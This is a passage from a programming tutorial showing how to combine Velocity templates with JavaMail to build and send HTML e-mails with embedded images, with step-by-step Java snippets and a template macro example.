all the details of an actual e-mail message, such as the subject line,
sender/recipient e-mail address, sent date, and so on. The guidelines
for providers who implement the javax.mail.Message dictate that the
actual fetching of e-mail message components should be delayed as long
as possible in order to make this class as lightweight as possible.</p>
<h4 id="simple-java-mail-example">Simple JAVA Mail Example</h4>
<div class="sourceCode" id="cb4"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb4-1"><a aria-hidden="true" href="#cb4-1" tabindex="-1"></a> <span class="kw">import</span> <span class="im">java</span><span class="op">.</span><span class="im">beans</span><span class="op">.*;</span></span>
<span id="cb4-2"><a aria-hidden="true" href="#cb4-2" tabindex="-1"></a> <span class="kw">import</span> <span class="im">javax</span><span class="op">.</span><span class="im">mail</span><span class="op">.*;</span></span>
<span id="cb4-3"><a aria-hidden="true" href="#cb4-3" tabindex="-1"></a> <span class="kw">import</span> <span class="im">javax</span><span class="op">.</span><span class="im">mail</span><span class="op">.</span><span class="im">internet</span><span class="op">.*;</span></span>
<span id="cb4-4"><a aria-hidden="true" href="#cb4-4" tabindex="-1"></a> <span class="kw">import</span> <span class="im">java</span><span class="op">.</span><span class="im">io</span><span class="op">.*;</span></span>
<span id="cb4-5"><a aria-hidden="true" href="#cb4-5" tabindex="-1"></a> <span class="kw">import</span> <span class="im">java</span><span class="op">.</span><span class="im">util</span><span class="op">.*;</span></span>
<span id="cb4-6"><a aria-hidden="true" href="#cb4-6" tabindex="-1"></a> <span class="kw">public</span> <span class="kw">class</span> MailBean <span class="op">{</span></span>
<span id="cb4-7"><a aria-hidden="true" href="#cb4-7" tabindex="-1"></a> <span class="kw">public</span> <span class="fu">MailBean</span><span class="op">(</span><span class="bu">String</span> from<span class="op">,</span> <span class="bu">String</span> userName<span class="op">,</span> <span class="bu">String</span> subject<span class="op">,</span> <span class="bu">String</span> content<span class="op">){</span></span>
<span id="cb4-8"><a aria-hidden="true" href="#cb4-8" tabindex="-1"></a> <span class="cf">try</span><span class="op">{</span></span>
<span id="cb4-9"><a aria-hidden="true" href="#cb4-9" tabindex="-1"></a> <span class="fu">mail</span><span class="op">(</span>from<span class="op">,</span> userName<span class="op">,</span> subject<span class="op">,</span> content<span class="op">);</span></span>
<span id="cb4-10"><a aria-hidden="true" href="#cb4-10" tabindex="-1"></a> <span class="op">}</span><span class="cf">catch</span><span class="op">(</span>MessagingException e<span class="op">)</span> <span class="op">{}</span></span>
<span id="cb4-11"><a aria-hidden="true" href="#cb4-11" tabindex="-1"></a> <span class="op">}</span></span>
<span id="cb4-12"><a aria-hidden="true" href="#cb4-12" tabindex="-1"></a> <span class="kw">public</span> <span class="bu">String</span> <span class="fu">getBeanInfo</span><span class="op">(){</span></span>
<span id="cb4-13"><a aria-hidden="true" href="#cb4-13" tabindex="-1"></a> <span class="cf">return</span> <span class="st">"A Bean that sends mail"</span><span class="op">;</span></span>
<span id="cb4-14"><a aria-hidden="true" href="#cb4-14" tabindex="-1"></a> <span class="op">}</span></span>
<span id="cb4-15"><a aria-hidden="true" href="#cb4-15" tabindex="-1"></a> <span class="kw">public</span> <span class="dt">void</span> <span class="fu">mail</span><span class="op">(</span><span class="bu">String</span> from<span class="op">,</span> <span class="bu">String</span> userName<span class="op">,</span> <span class="bu">String</span> subject<span class="op">,</span> <span class="bu">String</span> content<span class="op">)</span><span class="kw">throws</span> MessagingException<span class="op">{</span></span>
<span id="cb4-16"><a aria-hidden="true" href="#cb4-16" tabindex="-1"></a> <span class="bu">String</span> smtpHost <span class="op">=</span> <span class="st">"00.00.00.00"</span><span class="op">;</span></span>
<span id="cb4-17"><a aria-hidden="true" href="#cb4-17" tabindex="-1"></a> <span class="co">//start a session</span></span>
<span id="cb4-18"><a aria-hidden="true" href="#cb4-18" tabindex="-1"></a> java<span class="op">.</span><span class="fu">util</span><span class="op">.</span><span class="fu">Properties</span> properties <span class="op">=</span> <span class="bu">System</span><span class="op">.</span><span class="fu">getProperties</span><span class="op">();</span></span>
<span id="cb4-19"><a aria-hidden="true" href="#cb4-19" tabindex="-1"></a> properties<span class="op">.</span><span class="fu">put</span><span class="op">(</span><span class="st">"mail.smtp.host"</span><span class="op">,</span>smtpHost<span class="op">);</span></span>
<span id="cb4-20"><a aria-hidden="true" href="#cb4-20" tabindex="-1"></a> Session session <span class="op">=</span> Session<span class="op">.</span><span class="fu">getInstance</span><span class="op">(</span>properties<span class="op">,</span><span class="kw">null</span><span class="op">);</span></span>
<span id="cb4-21"><a aria-hidden="true" href="#cb4-21" tabindex="-1"></a></span>
<span id="cb4-22"><a aria-hidden="true" href="#cb4-22" tabindex="-1"></a> <span class="co">//Construct a message object</span></span>
<span id="cb4-23"><a aria-hidden="true" href="#cb4-23" tabindex="-1"></a> MimeMessage message <span class="op">=</span> <span class="kw">new</span> <span class="fu">MimeMessage</span><span class="op">(</span>session<span class="op">);</span></span>
<span id="cb4-24"><a aria-hidden="true" href="#cb4-24" tabindex="-1"></a> message<span class="op">.</span><span class="fu">setFrom</span><span class="op">(</span><span class="kw">new</span> <span class="fu">InternetAddress</span><span class="op">(</span>from<span class="op">));</span></span>
<span id="cb4-25"><a aria-hidden="true" href="#cb4-25" tabindex="-1"></a> message<span class="op">.</span><span class="fu">addRecipient</span><span class="op">(</span>Message<span class="op">.</span><span class="fu">RecipientType</span><span class="op">.</span><span class="fu">TO</span><span class="op">,</span><span class="kw">new</span> <span class="fu">InternetAddress</span><span class="op">(</span>userName<span class="op">));</span></span>
<span id="cb4-26"><a aria-hidden="true" href="#cb4-26" tabindex="-1"></a> message<span class="op">.</span><span class="fu">setSubject</span><span class="op">(</span>subject<span class="op">);</span></span>
<span id="cb4-27"><a aria-hidden="true" href="#cb4-27" tabindex="-1"></a> message<span class="op">.</span><span class="fu">setText</span><span class="op">(</span>content<span class="op">);</span></span>
<span id="cb4-28"><a aria-hidden="true" href="#cb4-28" tabindex="-1"></a> message<span class="op">.</span><span class="fu">setSentDate</span><span class="op">(</span><span class="kw">new</span> java<span class="op">.</span><span class="fu">util</span><span class="op">.</span><span class="fu">Date</span><span class="op">());</span></span>
<span id="cb4-29"><a aria-hidden="true" href="#cb4-29" tabindex="-1"></a></span>
<span id="cb4-30"><a aria-hidden="true" href="#cb4-30" tabindex="-1"></a> <span class="co">//connect to transport</span></span>
<span id="cb4-31"><a aria-hidden="true" href="#cb4-31" tabindex="-1"></a> Transport transport <span class="op">=</span> session<span class="op">.</span><span class="fu">getTransport</span><span class="op">(</span><span class="st">"smtp"</span><span class="op">);</span></span>
<span id="cb4-32"><a aria-hidden="true" href="#cb4-32" tabindex="-1"></a> transport<span class="op">.</span><span class="fu">connect</span><span class="op">(</span>smtpHost<span class="op">,</span><span class="st">""</span><span class="op">,</span> <span class="st">""</span><span class="op">);</span></span>
<span id="cb4-33"><a aria-hidden="true" href="#cb4-33" tabindex="-1"></a></span>
<span id="cb4-34"><a aria-hidden="true" href="#cb4-34" tabindex="-1"></a> <span class="co">//send the message and close the connection</span></span>
<span id="cb4-35"><a aria-hidden="true" href="#cb4-35" tabindex="-1"></a> transport<span class="op">.</span><span class="fu">sendMessage</span><span class="op">(</span>message<span class="op">,</span>message<span class="op">.</span><span class="fu">getAllRecipients</span><span class="op">());</span></span>
<span id="cb4-36"><a aria-hidden="true" href="#cb4-36" tabindex="-1"></a> transport<span class="op">.</span><span class="fu">close</span><span class="op">();</span></span>
<span id="cb4-37"><a aria-hidden="true" href="#cb4-37" tabindex="-1"></a> <span class="op">}</span></span>
<span id="cb4-38"><a aria-hidden="true" href="#cb4-38" tabindex="-1"></a> <span class="op">}</span></span></code></pre></div>
<p>As there are a lot of tutorials available for Velocity and Java Mail,
this tutorial deals only with the integration of Velocity for easier and
more customized mailing abilities.</p>
<h3 id="project-usage">Project Usage</h3>
<p>Our project required nearly fifty different mail formats to be sent
at various stages of the application. The difficult part was that the
templates contained a lot of dynamic data. The templates were also
updated on a regular basis, which made developing the application
harder.</p>
<p>We used Velocity templates to store the design and layout of each
mail and merged the dynamic attributes into that layout at send time,
which gave us a clean separation between the presentation and the
business layers.</p>
<h2 id="step-by-step-explanation-of-the-code">Step-by-Step Explanation
of the Code</h2>
<h3 id="sendmessage.java">SendMessage.java</h3>
<p><strong>Velocity Template Merging</strong></p>
<ul>
<li>It is good practice to store constants such as the SMTP connection
parameters and the template names either in a properties file or in a
constants interface. In this example, a properties file,
“mail.properties”, is used. The properties file is loaded using the
ClassLoader</li>
</ul>
<div class="sourceCode" id="cb5"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb5-1"><a aria-hidden="true" href="#cb5-1" tabindex="-1"></a> <span class="bu">Properties</span> props <span class="op">=</span> <span class="kw">new</span> <span class="bu">Properties</span><span class="op">();</span></span>
<span id="cb5-2"><a aria-hidden="true" href="#cb5-2" tabindex="-1"></a> props<span class="op">.</span><span class="fu">load</span><span class="op">(</span>SendMessage<span class="op">.</span><span class="fu">class</span><span class="op">.</span><span class="fu">getClassLoader</span><span class="op">().</span><span class="fu">getResourceAsStream</span><span class="op">(</span><span class="st">"mail.properties"</span><span class="op">));</span></span></code></pre></div>
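<p>For reference, the sketch below shows what such a properties file might contain and how its values are read back. The key names <code>smtpHost</code> and <code>hostname</code> are the ones read by the <code>getProperty</code> calls in this post; the values and the class name <code>MailProperties</code> are placeholders assumed for the example, and the file contents are inlined as a string so the snippet runs without a classpath resource.</p>

```java
import java.io.IOException;
import java.io.StringReader;
import java.io.UncheckedIOException;
import java.util.Properties;

public class MailProperties {
    // Hypothetical contents of mail.properties; the values are placeholders.
    static final String SAMPLE =
            "smtpHost=smtp.example.com\n" +
            "hostname=www.example.com\n";

    /** Parses properties-file text into a Properties object. */
    static Properties parse(String text) {
        Properties props = new Properties();
        try {
            props.load(new StringReader(text));
        } catch (IOException e) {
            // Reading from an in-memory string should not fail; rethrow unchecked.
            throw new UncheckedIOException(e);
        }
        return props;
    }

    public static void main(String[] args) {
        Properties props = parse(SAMPLE);
        System.out.println(props.getProperty("smtpHost"));
        System.out.println(props.getProperty("hostname"));
    }
}
```

<p>When loading from the classpath, note that <code>getResourceAsStream</code> returns <code>null</code> if the file is not found, so it is worth checking the stream before passing it to <code>load</code>.</p>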
<ul>
<li>The Mail.vm template is loaded using the static method
Velocity.getTemplate, and a new VelocityContext is created</li>
</ul>
<div class="sourceCode" id="cb6"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb6-1"><a aria-hidden="true" href="#cb6-1" tabindex="-1"></a> Template template <span class="op">=</span> Velocity<span class="op">.</span><span class="fu">getTemplate</span><span class="op">(</span><span class="st">"Mail.vm"</span><span class="op">);</span></span>
<span id="cb6-2"><a aria-hidden="true" href="#cb6-2" tabindex="-1"></a> VelocityContext context <span class="op">=</span> <span class="kw">new</span> <span class="fu">VelocityContext</span><span class="op">();</span></span></code></pre></div>
<ul>
<li>Then the user defined MailBean is placed in the velocity Context
under the name “MailBean”</li>
</ul>
<div class="sourceCode" id="cb7"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb7-1"><a aria-hidden="true" href="#cb7-1" tabindex="-1"></a> context<span class="op">.</span><span class="fu">put</span><span class="op">(</span><span class="st">"MailBean"</span> <span class="op">,</span> mailBean<span class="op">);</span></span></code></pre></div>
<ul>
<li>Along with beans, we can place name value pairs directly in the
velocity context</li>
</ul>
<div class="sourceCode" id="cb8"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb8-1"><a aria-hidden="true" href="#cb8-1" tabindex="-1"></a> <span class="bu">String</span> host <span class="op">=</span> props<span class="op">.</span><span class="fu">getProperty</span><span class="op">(</span><span class="st">"hostname"</span><span class="op">);</span></span>
<span id="cb8-2"><a aria-hidden="true" href="#cb8-2" tabindex="-1"></a> context<span class="op">.</span><span class="fu">put</span><span class="op">(</span><span class="st">"host"</span><span class="op">,</span> host<span class="op">);</span></span>
<span id="cb8-3"><a aria-hidden="true" href="#cb8-3" tabindex="-1"></a> context<span class="op">.</span><span class="fu">put</span><span class="op">(</span><span class="st">"imgName"</span><span class="op">,</span> <span class="st">"smile.gif"</span><span class="op">);</span></span>
<span id="cb8-4"><a aria-hidden="true" href="#cb8-4" tabindex="-1"></a> context<span class="op">.</span><span class="fu">put</span><span class="op">(</span><span class="st">"context"</span><span class="op">,</span> <span class="st">"myApp"</span><span class="op">);</span></span></code></pre></div>
<ul>
<li>The context is then merged with the template and the result is
written to a StringWriter object</li>
</ul>
<div class="sourceCode" id="cb9"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb9-1"><a aria-hidden="true" href="#cb9-1" tabindex="-1"></a> <span class="bu">StringWriter</span> message <span class="op">=</span> <span class="kw">new</span> <span class="bu">StringWriter</span><span class="op">();</span></span>
<span id="cb9-2"><a aria-hidden="true" href="#cb9-2" tabindex="-1"></a> template<span class="op">.</span><span class="fu">merge</span><span class="op">(</span>context<span class="op">,</span> message<span class="op">);</span></span></code></pre></div>
<p><strong>JAVA Mail - E-Mail Creation</strong></p>
<ul>
<li>The SMTP Host variable is placed in the System Properties and the
javax.mail.Session is obtained for the given SMTP Host</li>
</ul>
<div class="sourceCode" id="cb10"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb10-1"><a aria-hidden="true" href="#cb10-1" tabindex="-1"></a> <span class="bu">Properties</span> sysProperties <span class="op">=</span> <span class="bu">System</span><span class="op">.</span><span class="fu">getProperties</span><span class="op">();</span></span>
<span id="cb10-2"><a aria-hidden="true" href="#cb10-2" tabindex="-1"></a> sysProperties<span class="op">.</span><span class="fu">put</span><span class="op">(</span><span class="st">"mail.smtp.host"</span><span class="op">,</span> props<span class="op">.</span><span class="fu">getProperty</span><span class="op">(</span><span class="st">"smtpHost"</span><span class="op">));</span></span>
<span id="cb10-3"><a aria-hidden="true" href="#cb10-3" tabindex="-1"></a> Session session <span class="op">=</span> Session<span class="op">.</span><span class="fu">getInstance</span><span class="op">(</span>sysProperties<span class="op">,</span> <span class="kw">null</span><span class="op">);</span></span></code></pre></div>
<ul>
<li><p>Since the e-mail needs to contain text and an image file, create
a MimeMultipart with the subtype declared as “related” so that the HTML
body can reference the image carried in the same message, and the image
is not lost if externally linked images are blocked by the recipient</p>
<pre><code> MimeMultipart multipart = new MimeMultipart("related");</code></pre></li>
</ul>
<p><strong>For adding the image to the e-mail</strong></p>
<ul>
<li>Create a body part for storing the image and embedding into the
e-mail</li>
</ul>
<div class="sourceCode" id="cb12"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb12-1"><a aria-hidden="true" href="#cb12-1" tabindex="-1"></a> BodyPart imageBodyPart <span class="op">=</span> <span class="kw">new</span> <span class="fu">MimeBodyPart</span><span class="op">();</span></span></code></pre></div>
<ul>
<li>Build the path to the image in the Web deployment folder, which the
FileDataSource will read. Note: <em>Using File.separator takes care of
the Windows/Unix environment issue</em></li>
</ul>
<div class="sourceCode" id="cb13"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb13-1"><a aria-hidden="true" href="#cb13-1" tabindex="-1"></a> <span class="bu">StringBuffer</span> imgPath <span class="op">=</span> <span class="kw">new</span> <span class="bu">StringBuffer</span><span class="op">().</span><span class="fu">append</span><span class="op">(</span><span class="bu">File</span><span class="op">.</span><span class="fu">separator</span><span class="op">).</span><span class="fu">append</span><span class="op">(</span><span class="st">"applications"</span><span class="op">).</span><span class="fu">append</span><span class="op">(</span><span class="bu">File</span><span class="op">.</span><span class="fu">separator</span><span class="op">).</span><span class="fu">append</span><span class="op">(</span><span class="st">"mailheader.GIF"</span><span class="op">);</span></span></code></pre></div>
<ul>
<li>Then using the DataHandler object place the image into the BodyPart
created</li>
</ul>
<div class="sourceCode" id="cb14"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb14-1"><a aria-hidden="true" href="#cb14-1" tabindex="-1"></a> <span class="bu">DataSource</span> fds <span class="op">=</span> <span class="kw">new</span> <span class="bu">FileDataSource</span><span class="op">(</span>imgPath<span class="op">.</span><span class="fu">toString</span><span class="op">());</span></span>
<span id="cb14-2"><a aria-hidden="true" href="#cb14-2" tabindex="-1"></a> imageBodyPart<span class="op">.</span><span class="fu">setDataHandler</span><span class="op">(</span><span class="kw">new</span> <span class="bu">DataHandler</span><span class="op">(</span>fds<span class="op">));</span></span></code></pre></div>
<ul>
<li>Set an id for the image body part so that the image can be accessed
anywhere in the mail for embedding</li>
</ul>
<div class="sourceCode" id="cb15"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb15-1"><a aria-hidden="true" href="#cb15-1" tabindex="-1"></a> imageBodyPart<span class="op">.</span><span class="fu">setHeader</span><span class="op">(</span><span class="st">"Content-ID"</span><span class="op">,</span><span class="st">"<123>"</span><span class="op">);</span></span></code></pre></div>
<ul>
<li>Add the Image Body Part into the MimeMultiPart object</li>
</ul>
<div class="sourceCode" id="cb16"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb16-1"><a aria-hidden="true" href="#cb16-1" tabindex="-1"></a> multipart<span class="op">.</span><span class="fu">addBodyPart</span><span class="op">(</span>imageBodyPart<span class="op">);</span></span></code></pre></div>
<p><strong>Adding the Message body content to the e-mail</strong></p>
<ul>
<li>Create a body part for storing the message content in the
e-mail</li>
</ul>
<div class="sourceCode" id="cb17"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb17-1"><a aria-hidden="true" href="#cb17-1" tabindex="-1"></a> BodyPart messageBodyPart <span class="op">=</span> <span class="kw">new</span> <span class="fu">MimeBodyPart</span><span class="op">();</span></span></code></pre></div>
<ul>
<li>Combine the StringWriter Object and the image src code using a
StringBuffer</li>
</ul>
<div class="sourceCode" id="cb18"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb18-1"><a aria-hidden="true" href="#cb18-1" tabindex="-1"></a> <span class="bu">StringBuffer</span> messageBuffer <span class="op">=</span> <span class="kw">new</span> <span class="bu">StringBuffer</span><span class="op">();</span></span>
<span id="cb18-2"><a aria-hidden="true" href="#cb18-2" tabindex="-1"></a> messageBuffer<span class="op">.</span><span class="fu">append</span><span class="op">(</span>message<span class="op">.</span><span class="fu">toString</span><span class="op">());</span></span>
<span id="cb18-3"><a aria-hidden="true" href="#cb18-3" tabindex="-1"></a> messageBuffer<span class="op">.</span><span class="fu">append</span><span class="op">(</span><span class="st">"<img src=\"cid:123\">"</span><span class="op">);</span></span></code></pre></div>
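<p>The link between the image part and the HTML is the identifier: the Content-ID header carries it in angle brackets (<code>&lt;123&gt;</code>), while the <code>cid:</code> URL in the <code>img</code> tag uses it without them. The helper below is a hypothetical sketch of that relationship, written with plain string handling so that it runs without the Java Mail library; <code>CidReference</code>, <code>cidUrl</code> and <code>imgTag</code> are names invented for this example.</p>

```java
public class CidReference {
    /** Turns a Content-ID header value such as "<123>" into the URL "cid:123". */
    static String cidUrl(String contentIdHeader) {
        String id = contentIdHeader.trim();
        // Strip the surrounding angle brackets if both are present.
        if (id.startsWith("<") && id.endsWith(">")) {
            id = id.substring(1, id.length() - 1);
        }
        return "cid:" + id;
    }

    /** Builds the img tag that refers to the embedded image part. */
    static String imgTag(String contentIdHeader) {
        return "<img src=\"" + cidUrl(contentIdHeader) + "\">";
    }

    public static void main(String[] args) {
        // prints <img src="cid:123">
        System.out.println(imgTag("<123>"));
    }
}
```

<p>Deriving both strings from one constant avoids the header and the HTML drifting apart when the identifier changes.</p>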
<ul>
<li>Set the message content type to <em>text/html</em>, since our
Velocity template (Mail.vm) is written in HTML, and add the message body
part to the main MimeMultipart object</li>
</ul>
<div class="sourceCode" id="cb19"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb19-1"><a aria-hidden="true" href="#cb19-1" tabindex="-1"></a> messageBodyPart<span class="op">.</span><span class="fu">setContent</span><span class="op">(</span>messageBuffer<span class="op">.</span><span class="fu">toString</span><span class="op">(),</span> <span class="st">"text/html"</span><span class="op">);</span></span>
<span id="cb19-2"><a aria-hidden="true" href="#cb19-2" tabindex="-1"></a> multipart<span class="op">.</span><span class="fu">addBodyPart</span><span class="op">(</span>messageBodyPart<span class="op">);</span></span></code></pre></div>
<p><strong>Sending the E-Mail</strong></p>
<ul>
<li>Create a MimeMessage using the javax.mail.Session Object</li>
</ul>
<div class="sourceCode" id="cb20"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb20-1"><a aria-hidden="true" href="#cb20-1" tabindex="-1"></a> Message msg <span class="op">=</span> <span class="kw">new</span> <span class="fu">MimeMessage</span><span class="op">(</span>session<span class="op">);</span></span></code></pre></div>
<ul>
<li>Set the MimeMultipart object created above as the content of the message</li>
</ul>
<div class="sourceCode" id="cb21"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb21-1"><a aria-hidden="true" href="#cb21-1" tabindex="-1"></a> msg<span class="op">.</span><span class="fu">setContent</span><span class="op">(</span>multipart<span class="op">);</span></span></code></pre></div>
<ul>
<li>The Recipients are added to the e-mail for the recipient types TO,
CC and BCC</li>
</ul>
<div class="sourceCode" id="cb22"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb22-1"><a aria-hidden="true" href="#cb22-1" tabindex="-1"></a> msg<span class="op">.</span><span class="fu">addRecipients</span><span class="op">(</span>Message<span class="op">.</span><span class="fu">RecipientType</span><span class="op">.</span><span class="fu">TO</span><span class="op">,</span> InternetAddress<span class="op">.</span><span class="fu">parse</span><span class="op">(</span><span class="st">"someone@example.com"</span><span class="op">));</span></span>
<span id="cb22-2"><a aria-hidden="true" href="#cb22-2" tabindex="-1"></a> msg<span class="op">.</span><span class="fu">addRecipients</span><span class="op">(</span>Message<span class="op">.</span><span class="fu">RecipientType</span><span class="op">.</span><span class="fu">CC</span><span class="op">,</span>InternetAddress<span class="op">.</span><span class="fu">parse</span><span class="op">(</span><span class="st">"everyone@example.com"</span><span class="op">));</span></span>
<span id="cb22-3"><a aria-hidden="true" href="#cb22-3" tabindex="-1"></a> <span class="cf">if</span><span class="op">((</span><span class="kw">null</span><span class="op">!=</span>recipientsList<span class="op">)&&(!</span>recipientsList<span class="op">.</span><span class="fu">isEmpty</span><span class="op">())){</span></span>
<span id="cb22-4"><a aria-hidden="true" href="#cb22-4" tabindex="-1"></a> <span class="cf">for</span><span class="op">(</span><span class="dt">int</span> i<span class="op">=</span><span class="dv">0</span><span class="op">;</span>i<span class="op"><</span>recipientsList<span class="op">.</span><span class="fu">size</span><span class="op">();</span>i<span class="op">++){</span></span>
<span id="cb22-5"><a aria-hidden="true" href="#cb22-5" tabindex="-1"></a> msg<span class="op">.</span><span class="fu">addRecipients</span><span class="op">(</span>Message<span class="op">.</span><span class="fu">RecipientType</span><span class="op">.</span><span class="fu">BCC</span><span class="op">,</span>InternetAddress<span class="op">.</span><span class="fu">parse</span><span class="op">(</span>recipientsList<span class="op">.</span><span class="fu">get</span><span class="op">(</span>i<span class="op">)));</span></span>
<span id="cb22-6"><a aria-hidden="true" href="#cb22-6" tabindex="-1"></a> <span class="op">}</span></span>
<span id="cb22-7"><a aria-hidden="true" href="#cb22-7" tabindex="-1"></a> <span class="op">}</span></span></code></pre></div>
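<p>Since <code>InternetAddress.parse</code> accepts a comma-separated list
of addresses, the BCC list could also be collapsed into one string and added
with a single <code>addRecipients</code> call. The helper below is a
hypothetical sketch of that preparation step in plain Java; it skips null and
blank entries and is not part of the original code.</p>

```java
import java.util.ArrayList;
import java.util.List;

// Sketch only: prepares a comma-separated address line from a recipient list.
final class RecipientListSketch {

    // Returns the non-blank addresses joined with commas, or "" for a null list.
    static String toAddressLine(List<String> recipients) {
        if (recipients == null) {
            return "";
        }
        List<String> cleaned = new ArrayList<>();
        for (String recipient : recipients) {
            if (recipient != null && !recipient.trim().isEmpty()) {
                cleaned.add(recipient.trim());
            }
        }
        return String.join(",", cleaned);
    }
}
```

<p>An empty result signals that there is nothing to add, which replaces the
explicit null and empty checks around the loop.</p>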
<ul>
<li>The Subject Text, Sent Date and the From Address are set as
below.</li>
</ul>
<div class="sourceCode" id="cb23"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb23-1"><a aria-hidden="true" href="#cb23-1" tabindex="-1"></a> msg<span class="op">.</span><span class="fu">setSubject</span><span class="op">(</span>subject<span class="op">);</span></span>
<span id="cb23-2"><a aria-hidden="true" href="#cb23-2" tabindex="-1"></a> msg<span class="op">.</span><span class="fu">setSentDate</span><span class="op">(</span><span class="kw">new</span> <span class="bu">Date</span><span class="op">());</span></span>
<span id="cb23-3"><a aria-hidden="true" href="#cb23-3" tabindex="-1"></a> msg<span class="op">.</span><span class="fu">setFrom</span><span class="op">(</span><span class="kw">new</span> <span class="fu">InternetAddress</span><span class="op">(</span><span class="st">"dummy@example.com"</span><span class="op">));</span></span></code></pre></div>
<ul>
<li>The Transport object creates the connection to the SMTP host and
sends the e-mail. It is obtained from the session by calling the
getTransport method with <em>smtp</em> as the protocol</li>
</ul>
<div class="sourceCode" id="cb24"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb24-1"><a aria-hidden="true" href="#cb24-1" tabindex="-1"></a> Transport transport <span class="op">=</span> session<span class="op">.</span><span class="fu">getTransport</span><span class="op">(</span><span class="st">"smtp"</span><span class="op">);</span></span></code></pre></div>
<ul>
<li>Then the Transport is connected using the HOST, UserName and
Password parameters from the properties file</li>
</ul>
<div class="sourceCode" id="cb25"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb25-1"><a aria-hidden="true" href="#cb25-1" tabindex="-1"></a> transport<span class="op">.</span><span class="fu">connect</span><span class="op">(</span>props<span class="op">.</span><span class="fu">getProperty</span><span class="op">(</span><span class="st">"connectHost"</span><span class="op">),</span></span>
<span id="cb25-2"><a aria-hidden="true" href="#cb25-2" tabindex="-1"></a> props<span class="op">.</span><span class="fu">getProperty</span><span class="op">(</span><span class="st">"connectUser"</span><span class="op">),</span></span>
<span id="cb25-3"><a aria-hidden="true" href="#cb25-3" tabindex="-1"></a> props<span class="op">.</span><span class="fu">getProperty</span><span class="op">(</span><span class="st">"connectPassword"</span><span class="op">));</span></span></code></pre></div>
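<p>A missing connection property only surfaces as a failure at connect time,
so it can help to validate the values when they are loaded. The sketch below
uses only <code>java.util.Properties</code>; the key names come from the
snippet above, while the class, the <code>require</code> helper and the sample
values used to exercise it are assumptions for illustration.</p>

```java
import java.io.IOException;
import java.io.StringReader;
import java.io.UncheckedIOException;
import java.util.Properties;

// Sketch only: loads properties text and fails fast on missing keys.
final class MailPropertiesSketch {

    // Parses properties-file syntax from a string (a file reader works the same way).
    static Properties load(String text) {
        Properties props = new Properties();
        try {
            props.load(new StringReader(text));
        } catch (IOException e) {
            throw new UncheckedIOException(e);
        }
        return props;
    }

    // Returns the trimmed value, or throws if the key is absent or blank.
    static String require(Properties props, String key) {
        String value = props.getProperty(key);
        if (value == null || value.trim().isEmpty()) {
            throw new IllegalStateException("Missing mail property: " + key);
        }
        return value.trim();
    }
}
```

<p>Calling <code>require(props, "connectHost")</code> and its siblings before
<code>transport.connect</code> turns a vague connection error into a message
that names the missing key.</p>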
<ul>
<li>The e-mail is then sent to all the recipients using the sendMessage
method</li>
</ul>
<div class="sourceCode" id="cb26"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb26-1"><a aria-hidden="true" href="#cb26-1" tabindex="-1"></a> transport<span class="op">.</span><span class="fu">sendMessage</span><span class="op">(</span>msg<span class="op">,</span>msg<span class="op">.</span><span class="fu">getAllRecipients</span><span class="op">());</span></span></code></pre></div>
<ul>
<li>The transport is closed to mark the end of the connection</li>
</ul>
<div class="sourceCode" id="cb27"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb27-1"><a aria-hidden="true" href="#cb27-1" tabindex="-1"></a> transport<span class="op">.</span><span class="fu">close</span><span class="op">();</span></span></code></pre></div>
<h4 id="mail.vm">Mail.vm</h4>
<p><strong>Image Path Macro</strong></p>
<p>This macro is used to return the path to be used as SRC by the images
in the HTML. It takes a parameter imgName and returns the string,</p>
<pre><code> https://$host/$context/images/$imgName</code></pre>
<p>where $host and $context are context variables set by the Java
code.</p>
<p>The macro looks like this:</p>
<pre><code> #macro( IMGURL $imgName )
https://$host/$context/images/$imgName
#end</code></pre>
<p>Example:</p>
<pre><code> <img src="#IMGURL('mailheader.GIF')" border="0" width="980" height="61"></code></pre>
<p>This will get generated as:</p>
<pre><code> <img src="https://localhost/myapp/images/mailheader.GIF" border="0" width="980" height="61"></code></pre>
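<p>For comparison, the string the macro produces can be written as an
ordinary Java method. This is only a sketch of the substitution, not of how
Velocity evaluates macros; the class and method names are hypothetical, and
the host and context values are passed in explicitly instead of being read
from the template context.</p>

```java
// Sketch only: mirrors the output of the IMGURL macro with plain concatenation.
final class ImgUrlSketch {

    // Builds https://<host>/<context>/images/<imgName>.
    static String imgUrl(String host, String context, String imgName) {
        return "https://" + host + "/" + context + "/images/" + imgName;
    }
}
```

<p>With host <code>localhost</code> and context <code>myapp</code>,
<code>imgUrl("localhost", "myapp", "mailheader.GIF")</code> yields the same
URL as the generated tag above.</p>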
<p><strong>Accessing the Bean Object</strong></p>
<p>The variables in the MailBean object placed in the context can be
accessed using <code>$MailBean.[variable-name]</code>. Example:
<code>Mail Content : $MailBean.content</code></p>
<h4 id="mail.properties">mail.properties</h4>
<p>This file contains the connection parameters and the other context
properties used by the Java code.</p>
<h3 id="advantages">Advantages</h3>
<p>Designed as an easy-to-use general templating tool, Velocity is
useful in any Java application area that requires data formatting and
presentation. Its salient advantages are:</p>
<ul>
<li>It adapts to many application areas.</li>
<li>It offers a simple, clear syntax for the template designer.</li>
<li>It offers a simple programming model for the developer.</li>
<li>Because templates and code are separate, you can develop and
maintain them independently.</li>
<li>The Velocity engine easily integrates into any Java application
environment, especially Servlets.</li>
<li>Velocity enables templates to access any public method of data
objects in the context.</li>
</ul>
